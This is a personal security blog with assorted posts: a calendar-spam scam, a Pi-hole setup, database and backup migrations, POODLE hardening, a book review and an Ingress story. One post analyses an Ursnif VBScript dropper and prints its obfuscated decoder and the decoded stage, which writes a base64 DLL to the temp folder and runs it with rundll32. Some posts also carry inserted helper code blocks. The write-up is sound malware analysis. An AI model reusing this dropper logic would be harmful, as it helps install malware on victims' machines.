
/ˈpeːtər/, n • Security consultant at Atos • Dutch computer geek • Living together with Christina and father of 3 boys • Opinions are my own • He/him

Personal notes migrated to Joplin

1 min read

I was puzzling for a while over how to handle my personal notes, primarily in the terminal on the various systems, just so I can find the procedures I use for upgrades that I can't recall from memory.

As an additional issue, I still had personal notes in Microsoft OneNote, with the notes file stored on my ownCloud instance.

After browsing around I found Joplin, which covers most of my needs; the only thing is that Joplin works best if you know Markdown, which I basically do, but this could be a limitation.

So for now this is my personal notes solution, with the Windows app installed on 3 workstations, on my iPhone and on 2 Unix systems.

iPhone calendar abuse

2 min read

I actually fell for this attack, which uses the iPhone calendar to create notifications that get me to click on a link. I wasn't aware of this vector via the iPhone calendar before; I knew it was done via Gmail's calendar.

Browsing around a little, I visited a site, got redirected to a web page, and it gave me a pop-up to update my calendar. I was still lying in bed that morning, so I wasn't careful touching the screen and tapped Allow 😒.

I don't use the iPhone's built-in calendar, so I wasn't too worried; I checked it briefly but didn't see anything right away, so I parked it in my head as something to look into at a later stage.

Fast forward two days, and in the evening I get the following pop-up:

Then I remembered allowing the site to add things to my calendar. So I decided to check this out and clean up the mess that was still pending. Looking at my calendar, I saw 4 reminders for that evening and, as you can see in the screenshot below, 10 additional reminders.

I had just updated my iPhone to iOS 13.6, so all known exploits were fixed, and I assumed they were probably not going to waste a zero-day on this 😄.

So, clicking the link, I get the kind of normal scare screen and press the Close link.


And I get a pretty decently recreated page to install a VPN app; not sure how that is going to help me with the virus, but who cares 🤷

If you click 'verwijder alle virussen' (remove all viruses) or wait the 2 minutes, you get redirected to install the following app. I assume this is where the money is made: if the app gets installed with their affiliate code, they earn some money. An interesting detail is that Savestock is neither a VPN nor an antivirus app.


Recovering from this wasn't that big of a deal, although I needed to google how to remove a calendar subscription.

"Tap Settings > Accounts & Passwords > Subscribed Calendars": there you find the calendars you are subscribed to, in this case the "CLICK SUBSCRIBE..." one.

Then delete the account.

Short VisualBasic #Ursnif dropper write-up

3 min read

Here is my first post of a short investigation into a malicious script that I came across.

The sample was posted to the list. This is probably part of a phishing mail that directs you to download the zip file and open it.

When you do this, the VisualBasic script inside the zip archive will typically be launched and the encoded payload will be executed on the system.

After unzipping we can have a first look at the .vbs script

The malicious script consists of:

  • A large string ending in "AAAAMAAQqVT". I'm already assuming a reversed PE executable: when you base64 encode the MZ header it results in something like TVxx.
  • Two arrays
  • A short code block to decode the arrays into something useful:
for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr) : YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN))) : HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf : next : execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)

A little rewriting, and making it safer by echoing the output instead of executing it, results in the following VBS code:

for Value = lbound(ArrayOne) to ubound(ArrayTwo)
    ' each character is the difference of the two square roots
    Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value)))
    ConcatResult = ConcatResult & Result
next
' print the decoded second stage instead of executing it
WScript.Echo ConcatResult

Running this results in the following script.

on error resume next
set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = ""
if  (FSO.FileExists(Path))  Then
    WScript.Echo "Error!"
    xml = "Msxml2.DOMDocument"
    ws = "WScript.Shell"
    bin = "bin.base64"
    sa = "shell.application"
    bs = "base64"
    db = "Adodb.Stream"
    Set wshs = createobject(ws)
    Set sh = createobject(sa)
    filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll"
end if

Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(code)

Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0

The script places an Adobe.url in the temp folder pointing to
and, as I already suspected, it does a string reverse on the code variable (strreverse(code)).
Passing this through the base64 decoder results in a PE executable on the filesystem in your temp folder with the name SHCSdw.dll.
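To make the two decoding steps above reproducible outside a Windows host, here is an added Python analysis helper (not the dropper's code and not part of the original post). It replays the two-array loop (chr(sqr(a) - sqr(b)) per index) and the strreverse-then-base64 unpacking, and checks whether the result starts with an MZ header. The arrays and the 12-byte DOS header stub are constructed for the example; they are not the real sample's values, but the stub is chosen so that its reversed base64 ends in the same "AAAAMAAQqVT" tail the post describes.

```python
import base64
import math

# Added example for analysing the dropper's two-array encoding and the reversed
# base64 payload. Not the dropper's own code; the arrays and the DOS-header
# stub below are constructed sample input.


def decode_pairs(array_one, array_two):
    """Replay the dropper's loop: one character per index, chr(sqr(a) - sqr(b)).

    VBScript's Chr() truncates a fractional argument; every value in a real
    sample is a perfect square, so round() only guards against float noise.
    """
    chars = []
    for a, b in zip(array_one, array_two):
        chars.append(chr(round(math.sqrt(a) - math.sqrt(b))))
    return "".join(chars)


def unpack_reversed_base64(blob):
    """Undo strreverse(code) and the MSXML bin.base64 decode in one step."""
    return base64.b64decode(blob[::-1], validate=True)


def looks_like_pe(data):
    """First sanity check on the unpacked bytes: do they start with 'MZ'?"""
    return data[:2] == b"MZ"


# --- constructed sample input (not the real sample's values) ---

# Stage-two text hidden in the two arrays. ArrayOne[i] is (ord(c) + k)^2 and
# ArrayTwo[i] is k^2 for a small per-position k, so sqr(a) - sqr(b) = ord(c).
STAGE_TWO_TEXT = 'WScript.Echo "stage two"'
_OFFSETS = [(i % 5) + 1 for i in range(len(STAGE_TWO_TEXT))]
ARRAY_ONE = [(ord(c) + k) ** 2 for c, k in zip(STAGE_TWO_TEXT, _OFFSETS)]
ARRAY_TWO = [k ** 2 for k in _OFFSETS]

# First 12 bytes of a DOS header (e_magic "MZ", e_cblp, e_cp, e_crlc, e_cparhdr),
# stored the way the dropper stores its payload: base64-encoded, then reversed.
# base64 of these bytes is "TVqQAAMAAAAEAAAA", so the reversed blob ends in
# "...AAAAMAAQqVT", the tail the post spotted in the large string.
DOS_HEADER_STUB = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"
REVERSED_B64_PAYLOAD = base64.b64encode(DOS_HEADER_STUB).decode("ascii")[::-1]


def analyse(array_one, array_two, reversed_blob):
    """Return (stage-two text, payload bytes, is_pe) for a sample's artefacts."""
    stage_two = decode_pairs(array_one, array_two)
    payload = unpack_reversed_base64(reversed_blob)
    return stage_two, payload, looks_like_pe(payload)


if __name__ == "__main__":
    text, payload, is_pe = analyse(ARRAY_ONE, ARRAY_TWO, REVERSED_B64_PAYLOAD)
    print("stage two :", text)
    print("blob tail :", REVERSED_B64_PAYLOAD[-11:])
    print("payload   :", payload.hex(), "(PE)" if is_pe else "(not PE)")
```

For a real sample you would paste the two arrays and the large string from the .vbs into `ARRAY_ONE`, `ARRAY_TWO` and `REVERSED_B64_PAYLOAD`; the decoded text is only printed, never executed, and the unpacked bytes can be hashed and looked up before anything else is done with them.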

The dropped file SHCSdw.dll is an Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can trust this timestamp. The sample is available on VirusTotal.


File                Type                     sha256
                    Zip archive data         bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c
dokument9055.vbs    VisualBasic script       98b3160c553c229cb9be77de3791398aed3cce79e7935d96db9e32bf353b9624
SHCSdw.dll          PE32 executable (DLL)    bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg

1 min read

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg
My rating: 5 of 5 stars

It came recommended in the Darknet Diaries podcast, ep. 54: NotPetya, by Jack Rhysider.
As far as I'm concerned this is a must-read for anyone working in cybersecurity. It gives a lot of detail about the Russian government's hacking techniques and motivations.
I already knew most of the separate attacks described in the book, but getting the big picture of how all of these are related is an eye-opener.


DNS-over-HTTPS in the Pi-hole

1 min read

On the Raspberry Pi, install the dnss package:

apt install dnss

Edit the socket settings to make it listen on port 5053; normally it listens on 53.

vi /etc/systemd/system/

# Sockets for dnss.
# This lets dnss run unprivileged.
# We typically want one UDP and one TCP socket.



And restart the service. Because the Pi-hole is already running, starting dnss probably failed right after installation, since port 53 is in use:

systemctl restart dnss.socket

In the Pi-hole admin web interface, under Settings, open the DNS tab and point the upstream DNS server at the dnss installation.

Pi-Hole - Upstream DNS Servers

And we're good to go. dnss uses by default
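As an added helper, not part of the original post and not from the dnss project, the shell functions below render a dnss socket unit bound to the alternate port, extract the ports a unit binds so you can spot a clash with Pi-hole's port 53 before restarting, and produce the upstream value in the host#port form Pi-hole expects. The layout of the unit (ListenStream/ListenDatagram lines under [Socket], the three comment lines quoted above) and the dnss.service unit name are assumptions about the dnss package.

```sh
#!/bin/sh
# Added example, not from the original post or the dnss project.
# Assumptions: dnss ships a systemd socket unit with ListenStream= and
# ListenDatagram= lines, and Pi-hole accepts an upstream written as host#port.

# render_dnss_socket PORT: print a socket unit that binds dnss to PORT
# instead of the default 53 (the unit layout is an assumption).
render_dnss_socket() {
    port="$1"
    cat <<EOF
# Sockets for dnss.
# This lets dnss run unprivileged.
# We typically want one UDP and one TCP socket.
[Unit]
Description=dnss sockets

[Socket]
ListenStream=$port
ListenDatagram=$port

[Install]
WantedBy=sockets.target
EOF
}

# socket_ports FILE: list the distinct ports a socket unit binds, so a clash
# with Pi-hole's 53 is visible before "systemctl restart dnss.socket".
socket_ports() {
    sed -n -e 's/^ListenStream=//p' -e 's/^ListenDatagram=//p' "$1" | sort -u
}

# pihole_upstream PORT: the value to enter as a custom upstream in Pi-hole.
pihole_upstream() {
    printf '127.0.0.1#%s\n' "$1"
}

# install_dnss_socket PORT: write the unit and restart (needs root; not run
# by the test). The unit path is where the post edits it.
install_dnss_socket() {
    render_dnss_socket "$1" > /etc/systemd/system/dnss.socket
    systemctl daemon-reload
    systemctl restart dnss.socket dnss.service
}
```

After the restart, `dig @127.0.0.1 -p 5053 example.org` should answer while `ss -lnu 'sport = :5053'` shows the UDP socket held by systemd; only then switch the Pi-hole upstream to the value `pihole_upstream 5053` prints.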



CPE Webcasts and Podcasts

1 min read

Since I'm a certified CISSP I need to reach my yearly CPE goal. For this I watch and listen to various webcasts and podcasts. At the moment this is what is on my diet.

Stormcast, Daily Information Security Podcast - Stormcasts are daily 5-10 minute information security threat updates from the SANS Internet Storm Center.

Digital Shadows ShadowTalk - Digital Shadows monitors and manages an organization’s digital risk, providing relevant threat intelligence across the widest range of data sources within the open, deep, and dark web to protect their brand, and reputation.

Troy Hunt's Weekly Update - Troy Hunt is the owner of Have I Been Pwned? (HIBP), a blogger, Microsoft Regional Director and MVP, and he speaks at security events and gives security training.

Paul's Security Weekly - Weekly security roundup by the Security Weekly team discussing the security highlights and lowlights.

FireEye State of The Hack - Weekly (?) show by FireEye with your update of the various APT and FIN groups.


1 min read


Can't resist putting these on my site; a much better attempt than my picture below.
These pictures were created by @paul_pearce.

Migrating Known from MySQL to PostgreSQL

1 min read

Below are the steps I've taken to finally migrate my self hosted Known site from MySQL to PostgreSQL.

Currently the website install routine only supports MySQL, so there is no need to go to either the /warmup or /begin folders on your site; you need to build the database manually:

createuser withknown

createdb -T template1 -O withknown withknown

psql -f /schema/postgres/postgres.sql withknown

To migrate the data from MySQL to PostgreSQL I use the mysql2postgresql tool by Mihail Shumilov:

mysqldump --xml -u root withknown > withknown.xml

php convertor.php -i withknown.xml -o withknown.sql

Edit the file withknown.sql and remove all the DROP, CREATE and ALTER lines so you are left with only the INSERT lines, which hold the actual site data (perhaps there is an option in mysqldump to do this directly).

To get rid of the over-escaping from MySQL, run the sed line below:

sed -e 's/\\\\/\\/g' withknown.sql > withknown-final.sql

As the last step, import the data into PostgreSQL:

psql -U withknown -f withknown-final.sql withknown

Make sure you update config.ini and change the connection info:

database = 'Postgres'
dbname = 'withknown'
dbpass = 'XXX'
dbuser = 'withknown'
dbhost = 'localhost'
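The manual edit (keep only the INSERT lines) and the sed unescape step can be done in one pass. Here is an added shell helper for that; it is not part of the Known project or of the original post. It assumes the converter writes one SQL statement per line, so a single INSERT never spans several lines; if your converter output wraps statements, check the line count before importing.

```sh
#!/bin/sh
# Added example, not from the Known project or the original post.
# Turns the converter's output into a data-only, unescaped file in one pass.
# All functions read stdin and write stdout. Assumes one statement per line.

# keep_inserts: drop the DROP/CREATE/ALTER statements the converter emits;
# the schema already comes from postgres.sql, so only INSERT rows are wanted.
keep_inserts() {
    grep -E '^INSERT[[:space:]]'
}

# unescape_mysql_dump: collapse the doubled backslashes the MySQL XML export
# leaves behind (the same substitution as the sed line above).
unescape_mysql_dump() {
    sed -e 's/\\\\/\\/g'
}

# prepare_import: converter output in, import-ready SQL out.
prepare_import() {
    keep_inserts | unescape_mysql_dump
}

# usage (not run here):
#   php convertor.php -i withknown.xml -o withknown.sql
#   prepare_import < withknown.sql > withknown-final.sql
#   psql -U withknown -f withknown-final.sql withknown
```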

Zolt - Daily news summaries for the US

2 min read



As requested by Nick Wyatt, I gave the app Zolt a try.

Zolt lets you quickly skim through the daily news by reading 500 news sources, curating the best stories and summarizing them in sixty words. All these stories are presented as simple-to-read cards that you can quickly swipe through. The app also lets you create a personal newsfeed, so if you like technology and sports you can include those in your personal feed, read that, and stay up to date.

After trying Zolt for a short time, I must say I really like the minimalistic design and technical implementation. The sharing options in the app are also great: being able to use the shout icon and respond to a post with text, a drawing or a photo is a nice feature. For me the biggest drawback is the content.

Zolt is clearly a US-minded application, and you see this clearly in the news items. Even in the international section, 8 out of the 10 news stories are about the US. So for me, as someone from Europe, this doesn't fulfil my need for news, even though the presentation and ease of consuming the content are great.

If you want to give it a try yourself the app is available for free on both Android and iOS.

The Explorations of Obsidius #Ingress

7 min read

I. It was my honor to serve under Titus as a member of the exploratores, the scouting troops, during the campaign in Judea. It was my fortune to have my commander and future emperor take notice of some novel tactics that I employed and name me Prime Exploratore, placing several soldiers (who had been deemed unfit for combat service) under my command. Titus, always wise and innovative, knew that they had value far beyond that of the traditional exploratores or spies (a word which I detest): they were to be different. I preferred the term Irregular Scout.

II. My small force numbered no more than twenty at any given time, with new recruits substituting for the many who had been captured or killed. They included three types of soldiers: those that were fleet of foot and agile, and thus able to scout large amounts of terrain in the distance; those who were able to blend into different social groups (which was very valuable in the Judea campaign), feigning other identities; and those who were able to impersonate noble personages for the purposes of gaining information. Personally, I had adopted all of these roles at different times and thus had a body of knowledge to share, and my Exploratores were quick to learn.

III. It was to my advantage that I was of average height and possibly mixed heritage. Possibly because, while my mother denies this, my features have always been undeniably different, and some have said that they belonged not to my father but to a gladiator from the east or perhaps Egypt with whom she dallied. My father, Marcus Atticus Tullius, was a merger of unfashionable but nonetheless well established republican families: Tullius being one of Marcus Tullius Cicero's relatives and Atticus being the famous statesman, also known as Cicero's correspondent. Atticus was quite possibly the most adroit politician of the age given that he died of natural causes in a treacherous political environment. As a youth I journeyed to Egypt, following a trail I thought might lead me to the truth of my parentage, but my own history remained oddly and irrevocably occluded. Whatever my lineage, I was gifted with the ability to appear to be the member of many tribes. With this gift, and the skills of both the traditional Exploratores and the Speculatores, I soon became something else altogether different.

IV. Raised in Judea, I spoke several languages and was familiar with the world of rough traders who traveled to distant and un-imagined lands. In fact, as a child, I snuck off with a caravan, pretending to be a stable boy, and made it deep into Persia before my true identity was discovered. I immediately returned. My family was perceived as quite powerful and thus dangerous in the region. My father served as a member of the royal cavalry (known later as the Praetorian Guard) and was present for the murder of Caligula. He was one of the few who survived the barbarous and vengeful actions of the German Guard upon the death of the debauched emperor.

V. This is fortunate for me, because I was born two years later. Feeling it safer to be in the East, my father accepted a posting there. It afforded me an upbringing of provincial privilege and exposure to the most exotic elements of the East, West, South and North (as Judea had strategic importance as the trail-head of nearly all trading routes from the far Persian, Egyptian and African regions, as well as the Hellenic, Latin and Assyrian ones). In short, I was exposed to the entire world. This gave me great knowledge to use later in life.

VI. I served Titus in Judea and attempted to serve those I'd grown up with as well. I credit myself with saving many lives in the Jewish Wars, but alas, there was no persuading some of them that attempts to fight the empire with force would not be successful. I suspect that the offshoot sect will be more effective in subverting the empire from within. After Judea I was sent north to battle the Germans. It was an utterly new challenge. I had no experience in dealing with the Ice and Forest People. With no hope of blending in, I had to survive in the water. Few can swim in the north, as it would be pointless for most months of the year.

VII. There, in the forest, I was able to locate a well concealed enemy encampment. However, before I could return to share this information, I was captured, set to be executed, and encountered a man who would change my life. His name was Valadian. He had achieved some status as a holy man or shaman or priest amongst the Barbarians. He came to me while I was caged in the rude forest outpost and asked one simple question: How had I discovered their hidden camp? What had led me there? I told him that I did not know. I had felt the pull of the Earth. I had followed an enemy.

VIII. He had me released from the cage and told me he wanted to follow the energy further. I saw no risk in doing so, as I had already been sentenced to death in a most ghastly manner (the Germanic Tribes excelled in this, frankly making our methods of execution look tame in comparison). I led him deep into the forest and we found ourselves standing amidst some ancient ruins. They were incredible to behold. Alive in some way that I cannot explain. After some silence, Valadian told me that I would be spared and that he would have great use for me if I would agree to honor the debt of my life when I returned to Roman lands. Having little choice, I agreed. I was now bound by oath.

IX. In truth, I was as fascinated by Valadian as he was by me, most notably because he possessed a Roman name though he was clearly a German. He told me to find my way to North Africa amidst the ruins of Carthage and find the Oracle of those parts, who would direct me to one known as The Magnus. There was no way I could reject this. My journey would take me not only to Rome, but to Egypt and North Africa. However, when I reached Rome again, I reported to Titus to tell him of my adventures in Germania, and upon the mention of Valadian, Titus dismissed his guards and secretary and asked to speak to me alone.

X. He told me to carry out the mission of Valadian and tell no-one of it, and should I meet the one known as Magnus, to send his regards. And then he, the son of the now Emperor of Rome, who would himself rule magnificently, if briefly, said something that would echo through the rest of my life: "For all of the blessings Jupiter has bestowed on me, I did not get yours. However, I did sense something and it was confirmed to me by Berenice on the one occasion when you were in her presence. Like you, she often traveled in disguise, for reasons we need not discuss here. What is more, she described you as 'Sensitiva'. Or that was the best translation to Latin that she could offer." He gave me a letter of transit through the Empire and assigned a loyal Numidian guide by the name of SYPHAX, as well as bestowing a generous number of Sestertii.

XI. When I arrived in North Africa, I realized that no one knew the exact location of the Oracle, and that the Oracle could only be found by uncovering the hallowed sanctuary where she dwelled. My guide was of no use, save to keep me out of dangerous lands and provide some local knowledge. I realized that I would have to find the Oracle myself. The task proved to be quite simple. I realized that it was yet another test of my special skills.

Scream Fortress 7

1 min read

Scream Fortress

I didn't expect the theme of Team Fortress to change already; I only started actively playing at the start of the Invasion Community Update. But of course, with Halloween around the corner, Scream Fortress is released.

More information on this release can be found on the official Scream Fortress site.

Cyber security from the get go

1 min read

With the current security climate it is important to start each project, whether a newly built mobile or web application or anything else, with security in mind. This means personnel with security training should be involved at all levels from the get-go. Even people on the sales team, in project management, and of course architects and developers should have security in mind.

On a lot of occasions security is still an afterthought that gets arranged a few weeks before the intended go-live of the environment, and any security findings in that environment then need to be fixed during those last few days, when there is hardly any time and/or funding left. I have seen application releases getting delayed and, worse, applications being deployed with security issues that have to be fixed in the first hotfix.

So it is pivotal that at all levels of the organisation the need for and urgency of cyber security policies and procedures are implemented before the next project starts.


- posted as "Peer Review: Discussion -- Role of Cyber Security" at Coursera

Playing around with Hortonworks hadoop

1 min read

Going through some of the Hortonworks tutorials to see how a Hadoop environment works.


I already achieved some successes, and I'm stubborn enough not to follow the tutorials to the letter, so I imported a dataset from the KNMI holding the average day temperature since 1950.


This first Pig script gets the average temperature of Eelde according to the dataset.


Apparently the answer to this query is 8.943 degrees Celsius.


And a small adjustment to the query shows that the maximum temperature was 27.7 degrees Celsius.

fighting the POODLE

1 min read

I updated my nginx configuration a little earlier today to make sure that we are not a possible victim of a POODLE attack on the SSLv3 protocol. You can read about it in CVE-2014-3566, and if you want you can also read the full details of the vulnerability here (PDF).

But it is good to know I still have my 'A' rating at Qualys SSL Labs.
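For reference, here is what the relevant nginx change looks like, as an added illustration rather than the post's actual configuration: the weak `ssl_protocols` line that still allows SSLv3 next to the corrected one. Host name and certificate paths are placeholders.

```nginx
# Added example, not the post's real nginx config. Host and paths are placeholders.

# Before: SSLv3 still enabled, so a downgraded connection can be attacked (POODLE, CVE-2014-3566).
#     ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2;

# After: SSLv3 removed. In 2014 the fix was "TLSv1 TLSv1.1 TLSv1.2"; with
# OpenSSL 1.1.1 or newer you can narrow it further, as below.
server {
    listen 443 ssl;
    server_name example.org;                                   # placeholder
    ssl_certificate     /etc/ssl/certs/example.org.pem;        # placeholder
    ssl_certificate_key /etc/ssl/private/example.org.key;      # placeholder

    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_prefer_server_ciphers on;
}
```

Run `nginx -t` before reloading, then re-test with SSL Labs; an SSLv3-capable `openssl s_client -connect example.org:443 -ssl3` should fail to complete the handshake.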


Bacula Storage daemon for Readynas Duo

1 min read

A couple of days ago I found that the old bacula-sd daemon was no longer accepting backups from my central backup server. The backup server runs version 7.0.4 and the storage daemon was still 5.0.3.

Because building is a bit tricky, I wanted to share the basic steps to get this done.

  • Download the QEMU development environment from the ReadyNAS forum.
  • Download the PostgreSQL version used on the director, then build and install PostgreSQL:

            cd postgresql

            ./configure && make && make install

  • Download the matching Bacula version and build and install it in a dummy root directory:

            cd bacula

            ./configure --enable-build-dird=no --with-postgresql=/usr/local/pgsql


            make install DESTDIR=/root/dummy

  • The complete install tree should now be in /root/dummy. I trimmed this to only hold bacula-sd and bacula-fd, but if you need more tools on the ReadyNAS you can keep them in here.
  • The final step is to copy everything to the ReadyNAS; my preferred method is via a tar archive.
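The trimming and packing of the last two steps, as an added shell helper that is not from the post or from the Bacula project. It assumes the tree was produced with `make install DESTDIR=...` as above and decides what to keep purely by file-name prefix (bacula-sd*, bacula-fd*), which catches the daemons and their .conf files wherever the configure prefix put them.

```sh
#!/bin/sh
# Added example, not from the original post or the Bacula project.
# Keeps only the storage-daemon and file-daemon files out of a DESTDIR install
# tree and packs them for copying to the ReadyNAS.

# trim_tree SRC DST: copy files named bacula-sd* / bacula-fd* from SRC to
# DST, keeping their relative paths (sbin/, etc/, ...).
trim_tree() {
    src="$1"
    dst="$2"
    find "$src" -type f \( -name 'bacula-sd*' -o -name 'bacula-fd*' \) |
    while IFS= read -r f; do
        rel="${f#"$src"/}"
        mkdir -p "$dst/$(dirname "$rel")"
        cp -p "$f" "$dst/$rel"
    done
}

# pack_tree DIR ARCHIVE: tar the trimmed tree with paths relative to DIR,
# so it unpacks on the NAS with:  tar -C / -xpf bacula-nas.tar
pack_tree() {
    tar -C "$1" -cpf "$2" .
}

# usage (not run here):
#   trim_tree /root/dummy /root/nas-tree
#   pack_tree /root/nas-tree /root/bacula-nas.tar
#   scp /root/bacula-nas.tar root@readynas:/root/
```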

View from the office (at Atos)

1 min read

Got my new car delivered by post 😄